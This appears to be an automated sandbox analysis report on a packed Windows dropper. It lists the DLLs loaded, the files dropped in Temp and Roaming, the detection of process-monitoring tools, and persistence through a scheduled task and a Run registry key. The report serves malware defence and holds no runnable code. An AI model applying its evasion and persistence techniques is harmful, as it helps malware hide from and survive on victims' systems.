Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\pud8g3zixE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: pud8g3zixE.exe

Static file information: File size 1946624 > 1048576

Source: pud8g3zixE.exe

Static PE information: Raw size of deetcwmf is bigger than: 0x100000 < 0x1a9c00

Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000019.00000003.1924934020.000001EBFDE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr
Source:	Binary string: wshbth.pdbGCTL source: firefox.exe, 00000019.00000003.1976959571.000001EBF1492000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000019.00000003.1974650691.000001EBF1494000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdb source: firefox.exe, 00000019.00000003.1976359294.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wshbth.pdb source: firefox.exe, 00000019.00000003.1976959571.000001EBF1492000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdb source: firefox.exe, 00000019.00000003.1974650691.000001EBF1494000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdbUGP source: firefox.exe, 00000019.00000003.1964531189.000001EBF141D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netprofm.pdb source: firefox.exe, 00000019.00000003.1972681970.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000019.00000003.1924934020.000001EBFDE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr
Source:	Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000019.00000003.1976359294.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netprofm.pdbUGP source: firefox.exe, 00000019.00000003.1972681970.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdb source: firefox.exe, 00000019.00000003.1964531189.000001EBF141D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Unpacked PE file: 0.2.pud8g3zixE.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Unpacked PE file: 2.2.svoutse.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Unpacked PE file: 5.2.svoutse.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Unpacked PE file: 15.2.svoutse.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;deetcwmf:EW;oqequikt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Unpacked PE file: 20.2.76251a0626.exe.e60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dnbdzjvd:EW;hwzrywcd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dnbdzjvd:EW;hwzrywcd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Unpacked PE file: 29.2.88b8632b35.exe.350000.0.unpack :EW;.rsrc :W;.idata :W; :EW;dnbdzjvd:EW;hwzrywcd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;dnbdzjvd:EW;hwzrywcd:EW;.taggant:EW;

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_00D542DE

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.15.dr	Static PE information: real checksum: 0x1b41e6 should be: 0x1b41a8
Source: svoutse.exe.0.dr	Static PE information: real checksum: 0x1e778c should be: 0x1e152b
Source: 88b8632b35.exe.15.dr	Static PE information: real checksum: 0x1b41e6 should be: 0x1b41a8
Source: pud8g3zixE.exe	Static PE information: real checksum: 0x1e778c should be: 0x1e152b
Source: 76251a0626.exe.15.dr	Static PE information: real checksum: 0x1b41e6 should be: 0x1b41a8

Source: pud8g3zixE.exe	Static PE information: section name:
Source: pud8g3zixE.exe	Static PE information: section name: .idata
Source: pud8g3zixE.exe	Static PE information: section name:
Source: pud8g3zixE.exe	Static PE information: section name: deetcwmf
Source: pud8g3zixE.exe	Static PE information: section name: oqequikt
Source: pud8g3zixE.exe	Static PE information: section name: .taggant
Source: svoutse.exe.0.dr	Static PE information: section name:
Source: svoutse.exe.0.dr	Static PE information: section name: .idata
Source: svoutse.exe.0.dr	Static PE information: section name:
Source: svoutse.exe.0.dr	Static PE information: section name: deetcwmf
Source: svoutse.exe.0.dr	Static PE information: section name: oqequikt
Source: svoutse.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name: .rsrc
Source: random[1].exe.15.dr	Static PE information: section name: .idata
Source: random[1].exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name: dnbdzjvd
Source: random[1].exe.15.dr	Static PE information: section name: hwzrywcd
Source: random[1].exe.15.dr	Static PE information: section name: .taggant
Source: 76251a0626.exe.15.dr	Static PE information: section name:
Source: 76251a0626.exe.15.dr	Static PE information: section name: .rsrc
Source: 76251a0626.exe.15.dr	Static PE information: section name: .idata
Source: 76251a0626.exe.15.dr	Static PE information: section name:
Source: 76251a0626.exe.15.dr	Static PE information: section name: dnbdzjvd
Source: 76251a0626.exe.15.dr	Static PE information: section name: hwzrywcd
Source: 76251a0626.exe.15.dr	Static PE information: section name: .taggant
Source: 88b8632b35.exe.15.dr	Static PE information: section name:
Source: 88b8632b35.exe.15.dr	Static PE information: section name: .rsrc
Source: 88b8632b35.exe.15.dr	Static PE information: section name: .idata
Source: 88b8632b35.exe.15.dr	Static PE information: section name:
Source: 88b8632b35.exe.15.dr	Static PE information: section name: dnbdzjvd
Source: 88b8632b35.exe.15.dr	Static PE information: section name: hwzrywcd
Source: 88b8632b35.exe.15.dr	Static PE information: section name: .taggant
Source: gmpopenh264.dll.tmp.25.dr	Static PE information: section name: .rodata

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Code function: 15_2_008BD77C push ecx; ret		15_2_008BD78F
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D70A76 push ecx; ret		21_2_00D70A89

Source: pud8g3zixE.exe	Static PE information: section name: entropy: 7.9836096053865475
Source: pud8g3zixE.exe	Static PE information: section name: deetcwmf entropy: 7.954684460410581
Source: svoutse.exe.0.dr	Static PE information: section name: entropy: 7.9836096053865475
Source: svoutse.exe.0.dr	Static PE information: section name: deetcwmf entropy: 7.954684460410581
Source: random[1].exe.15.dr	Static PE information: section name: dnbdzjvd entropy: 7.953166681708358
Source: 76251a0626.exe.15.dr	Static PE information: section name: dnbdzjvd entropy: 7.953166681708358
Source: 88b8632b35.exe.15.dr	Static PE information: section name: dnbdzjvd entropy: 7.953166681708358

Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\pud8g3zixE.exe	File created: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File created: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File created: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File created: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File created: C:\Windows\Tasks\svoutse.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88b8632b35.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88b8632b35.exe			Jump to behavior

